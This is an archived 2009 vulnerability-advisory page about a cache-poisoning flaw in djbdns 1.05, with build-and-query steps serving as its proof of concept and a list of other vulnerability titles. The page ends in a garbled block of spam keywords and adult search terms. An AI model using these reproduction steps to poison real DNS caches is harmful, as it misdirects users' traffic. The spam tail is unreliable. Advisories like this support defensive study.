exploits , vulnerabilities , articles , djbdns Long Response Packet Remote Cache Poisoning Vulnerability

Title	djbdns Long Response Packet Remote Cache Poisoning Vulnerability
Published	2009-02-27-12:00AM
Updated	2009-02-27-08:47PM
Class	Design Error
CVE
Remote	Yes
Local	No
Credit	Matthew Dempsky
Vulnerable	djbdns djbdns 1.05
Not Vulnerable
Code	The following proof of concept is available: # Download and build ucspi-tcp-0.88. $ curl -O http://cr.yp.to/ucspi-tcp/ucspi-tcp-0.88.tar.gz $ tar -zxf ucspi-tcp-0.88.tar.gz $ echo 'gcc -include /usr/include/errno.h -O' > ucspi-tcp-0.88/conf-cc $ make -C ucspi-tcp-0.88 # Download and build djbdns-1.05. $ curl -O http://cr.yp.to/djbdns/djbdns-1.05.tar.gz $ tar -zxf djbdns-1.05.tar.gz $ echo 'gcc -include /usr/include/errno.h -O' > djbdns-1.05/conf-cc $ make -C djbdns-1.05 # Use tcpclient and axfr-get to do a zone transfer for # www.example.com from www.example2.com. $ ./ucspi-tcp-0.88/tcpclient www.example.com 53 ./djbdns-1.05/axfr-get www.example.com data data.tmp # Use tinydns-data to compile data into data.cdb. $ ./djbdns-1.05/tinydns-data # Simulate an A query for www.example.com using the data # from the zone transfer. $ ./djbdns-1.05/tinydns-get a www.example.com
TXT

Vulnerabilities - newest 10 RSS | More

2009-12-15 TYPO3 Watchdog (aba_watchdog) Unspecified Information Disclosure Vulnerability
2009-12-15 PostgreSQL Index Function Session State Modification Local Privilege Escalation Vulnerability
2009-12-15 PostgreSQL NULL Character CA SSL Certificate Validation Security Bypass Vulnerability
2009-12-15 IBM DB2 prior to 9.5 Fix Pack 5 Multiple Unspecified Security Vulnerabilities
2009-12-15 Sun Ray Server Software Desktop Session Handling Local Security Bypass Vulnerability
2009-12-15 Mozilla Firefox Sage Extension RSS Feeds Cross Domain Scripting Vulnerability
2009-12-15 Adobe Reader and Acrobat (CVE-2009-4324) Remote Code Execution Vulnerability
2009-12-14 Microsoft Protected Extensible Authentication Protocol Authentication Bypass Vulnerability
2009-12-14 Google Chrome DNS Pre-Fetching Proxy Cache Information Disclosure Vulnerability
2009-12-14 Oracle E-Business Suite Multiple Remote Vulnerabilities

SECURITY RSS FEEDS

Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 01:17:10 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
ww.movx.co fils acirc Xtrainches 53wo.com Mobilethem /class.cs_ J...0][aut Group sex WWW.nb288. video boke XLXX www.slin8. Sex photor CMS is Fre Group sex naughty Tampilkan SEX.MOVES. ruiying.id mambo Remo WWW.INDIA free sexx WWW.INDIA Crack Data GET ...0][ i...p%3Fop Winmail Dog style mysl nudeimages Bandung be www.transm Tagger LE. nag sex 777 Crack Data www.free 4 cmd.gif sxy+video www.uugog. Crack Data samba 2.2. free antis www.videos port+1025 www.yiruis Www.Sexara i...Freadm Hashariha liuqian5.c